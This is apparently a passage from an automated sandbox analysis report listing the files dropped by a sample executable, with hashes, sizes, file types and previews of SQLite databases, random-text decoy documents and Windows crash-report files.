MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\ProgramData\EBFHJEGDAFHIJKECFBKJ

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FBFIDBFHDBGIDHJJEGHIIDAFID

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIIIIJDH

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HJDGCGDBGCAAEBFIECGHDGCAAE

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDDHMPCDUJ.xlsx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\ProgramData\JKKECBGIIIEBGCBGIDHDGCAKJE

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\ProgramData\KECBFBAE

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\LTKMYBSEYZ.docx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_q27UFusYdn.exe_17f263357178d1bd3398f7e1a5c12181ad9221_49752fc2_41f5f8f8-a691-4b0e-a676-bc26f5cb5f80\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0559074978610747
Encrypted:	false
SSDEEP:	192:ycpM2xH05oL5jSXZrMZ2VbzuiFcZ24IO8nB:dpM2xU5oL5j70bzuiFcY4IO8n
MD5:	A85C412148D08B0EE58F32EE69C4DF63
SHA1:	8F6C20BDCEED74C33B26FA2B8F5EEE0C3B12FBBE
SHA-256:	CE5DEE7C37BFD9E7E2DAE90A17C20CF67C3C2209414A7A11BE9996D6C8569E42
SHA-512:	F46231FE18EB1043AB11F0856DE26EC89810ED63AD46889C31C5F6C79568098599CFB0E445CB5C64D3796D59AF76B264160C15862774A2107517DE6FF859DDAC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.3.3.0.8.5.3.5.5.5.1.2.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.3.3.0.8.5.4.1.1.7.6.2.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.f.5.f.8.f.8.-.a.6.9.1.-.4.b.0.e.-.a.6.7.6.-.b.c.2.6.f.5.c.b.5.f.8.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.1.b.e.9.e.b.-.0.1.2.4.-.4.2.0.3.-.9.1.d.4.-.6.9.e.e.9.4.c.2.1.9.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.2.7.U.F.u.s.Y.d.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.1.0.-.0.0.0.1.-.0.0.1.4.-.6.0.4.a.-.4.e.9.d.4.f.9.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.9.7.4.b.c.8.6.8.f.5.2.f.1.4.8.7.b.2.7.7.9.6.5.6.0.e.f.b.d.e.8.0.0.0.0.0.a.1.6.!.0.0.0.0.b.f.c.e.6.a.6.8.3.9.d.2.f.a.1.5.9.6.9.1.e.a.f.7.e.d.8.8.4.e.9.3.b.4.8.1.e.d.3.5.!.q.2.7.U.F.u.s.Y.d.n...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER791E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Tue Apr 23 07:27:33 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	56882
Entropy (8bit):	2.6518321226358825
Encrypted:	false
SSDEEP:	384:UlcFQMSJnGZEE+3gHn2NsYKqntS2kEfaRw4+hAI+p:PQnhGZEEdasYKqnHwqhn+p
MD5:	AA8946DECE38E3242D70BEA8870FCED0
SHA1:	E89089CBB688D3D240B8B3AC38B0B324125C1F31
SHA-256:	A8DB81B310CB6AFB71AC27F95FFF86EB8F7E0532EC2EEF00E75C8D2731C2EE2C
SHA-512:	A23F992D5FCD32A7FEED332397A286E4A0EC8C28BB42D6D0F993E9DDEC34623E00CDE9A276241ABFAE406053926A73B027F2BD72ECCF6E3D8EF1FE09A4922486
Malicious:	false
Preview:	MDMP..a..... ........b'f............4...........p...<...........:2..........T.......8...........T............S..............."...........$..............................................................................eJ......0%......GenuineIntel............T............b'f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7A77.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8354
Entropy (8bit):	3.7010937650189373
Encrypted:	false
SSDEEP:	192:R6l7wVeJmd6+6Y9HSU9e2amgmfKjSpD3q89bNzdsfrnrm:R6lXJk6+6YNSU9BamgmfKINzWfLC
MD5:	65DF626437370241FC98D7014F20EAFB
SHA1:	DCECD76799FA43F9DBFF4E4F45D13B8F3408549F
SHA-256:	9B065F940E73D0E4CD8EC201769791F0B1B01CCD1BF7FFB91E788B55CE5DD9E4
SHA-512:	C3259B6D4F79868A701CCBEE9B7678E6008C57C6D5B799A5701E390775EA2E053FF0381F491D0251C759A47DF0A9E8CDE3D203337C38183140A4A753E9E9FE10
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.7.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7AA7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.4665927802639525
Encrypted:	false
SSDEEP:	48:cvIwWl8zsiNJg77aI94LWpW8VYDYm8M4JV8S89y8lFp0C+q8e8W8MYbec2k80s7a:uIjfinI7y67VPJV3RdClnAbV2kRs7Ryd
MD5:	C62E3CB579874D6B21CDC7E2D4523E31
SHA1:	BF34F8DD534C6DBD641E97B32EA93148ECB1EDE9
SHA-256:	43AC2E0CCBA1219A5131AF7E3CCF5755130627ECC0123C300B2734CFBFAEE709
SHA-512:	2ECC5B658958F58F8554B25BA2E21740AF462679A57EC550134339B1E0D0F32D7324390DBC006DBAA73E1787236CD49D28831311DA46F730B30C1209473D316A
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="292230" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\ProgramData\RAYHIWGKDI.docx

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69782189124949
Encrypted:	false
SSDEEP:	24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
MD5:	0640503E533EFB11CC70F43D2FFF4E26
